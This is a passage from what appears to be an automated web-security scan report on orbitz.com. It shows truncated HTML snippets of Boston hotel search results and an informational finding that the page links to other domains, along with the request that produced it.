=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=319853&hotel.hkey=319853_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/853/319853/W-Boston-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=50080&hotel.hkey=50080_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/080/50080/Super-8-WeymouthBoston-Area-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
kout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=4701&hotel.hkey=4701_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/701/4701/The-Westin-Waltham-Boston-Hotel-Exterior-3.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=317971&hotel.hkey=317971_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/971/317971/Crowne-Plaza-Hotel-BOSTON-NEWTON-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=206519&hotel.hkey=206519_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/519/206519/Hampton-Inn-Boston-Norwood-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=16123&hotel.hkey=16123_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/123/16123/Hilton-BostonDedham-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=36216&hotel.hkey=36216_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/216/36216/Residence-Inn-by-Marriott-Boston-North-ShoreDanvers-Hotel-Exterior-1-20110805-212119-014.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
kout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=7222&hotel.hkey=7222_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/222/7222/Hampton-Inn-BostonLogan-Airport-Hotel-Exterior-41.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=769&hotel.hkey=769_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/769/769/Boston-Marriott-Peabody-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=65358&hotel.hkey=65358_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/358/65358/Candlewood-Suites-BOSTON-BURLINGTON-Hotel-Exterior-4.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=126302&hotel.hkey=126302_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/302/126302/Homestead-Boston-Waltham-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
kout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=1243&hotel.hkey=1243_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/243/1243/Best-Western-TLC-Hotel-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=126192&hotel.hkey=126192_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/192/126192/Homestead-Boston-Burlington-Hotel-Exterior-1-20110806-191241-564.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=46267&hotel.hkey=46267_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/267/46267/Staybridge-Suites-BOSTON-BURLINGTON-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=21447&hotel.hkey=21447_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/447/21447/Sheraton-Needham-Hotel-Hotel-Exterior-5.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=21445&hotel.hkey=21445_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/445/21445/Holiday-Inn-Hotel-Suites-BOSTON-PEABODY-Hotel-Exterior-41-20110820-190324-704.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=39858&hotel.hkey=39858_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/858/39858/TownePlace-Suites-by-Marriott-Boston-North-ShoreDanvers-Lobby-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=104806&hotel.hkey=104806_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/806/104806/Holiday-Inn-Select-BOSTON-WOBURN-Hotel-Exterior-1-20110806-190117-024.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=65326&hotel.hkey=65326_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/326/65326/Candlewood-Suites-BOSTON-BRAINTREE-Hotel-Exterior-1-20110821-191228-688.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=213157&hotel.hkey=213157_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/157/213157/InterContinental-BOSTON-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star5/medium/star5-1.png" alt="5 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
kout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=5284&hotel.hkey=5284_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/284/5284/SpringHill-Suites-by-Marriott-Boston-Peabody-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=86956&hotel.hkey=86956_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/956/86956/Extended-Stay-Deluxe-Boston-Waltham-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=42996&hotel.hkey=42996_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/996/42996/Red-Roof-Inn-Boston-Woburn-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ut=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=19403&hotel.hkey=19403_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/403/19403/Holiday-Inn-BOSTON-DEDHAM-HTL-CONF-CTR-Hotel-Exterior-1-20110820-190332-771.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
kout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.showDetails=true&hotel.hid=2042&hotel.hkey=2042_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/042/2042/Hampton-Inn-BostonBraintree-Hotel-Exterior-1.jpg&#034;
                       }
   }" />
</a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom1&amp;Section=results&amp;channel=hotel&amp;tile=1317602326150&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom2&amp;Section=results&amp;channel=hotel&amp;tile=1317602326150&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
<li><a rel="nofollow" href="http://www.orbitzgames.com">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/">Orbitz for Agents</a>
...[SNIP]...
<li class="icon facebook">
                   <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook</a>
...[SNIP]...
<li class="icon twitter last">
                   <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter</a>
...[SNIP]...
</ul>

               
            <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/footerLogo/logo-1.png" alt="Orbitz" height="15" width="100" class="logo" />
    <div class="agencyInformation">
...[SNIP]...
<!-- [/standard Advert: 120x55_footer]    -->
<a href="https://seal.verisign.com/splash?form_file=fdf%2Fsplash.fdf&amp;dn=www.orbitz.com&amp;lang=en" class="link" target="_blank"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/verisign-1.gif" alt="logo" height="35" width="66" />
    </a> <a href="http://www.truste.org/ivalidate.php?url=www.orbitz.com&amp;sealid=101" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/truste-1.gif" alt="TRUSTe" height="35" width="128" />
    </a>
...[SNIP]...
<noscript>
            <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" />                
           </noscript>
...[SNIP]...

19.238. http://www.orbitz.com/shop/hotelsearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shop/hotelsearch

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=orbitz&grp=9705&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B141652382%3B20702477%3Ba%3Fhttp%3A%2F%2Fwww.orbitz.com%2Fpsi%3Ftype%3Dhotel%26market%3D%24%7Bcity%7D%2C%24%7Bcountryn%7D%26checkin%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm-dd%22%7D%26checkout%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm-dd%22%7D%26guests%3D%24%7Badults%7D%26rooms%3D%24%7Brooms%7D%26WT.mc_id%3Do_igo_merch_city_dated%26WT.mc_ev%3Dclick%26gcid%3DC11287x600-CY%24%7Bcity%7D%2C%24%7Bcountryn%7D&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=153&pos=0&aii=e3898191-1452-431e-82b6-c9f881ca9a4c&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
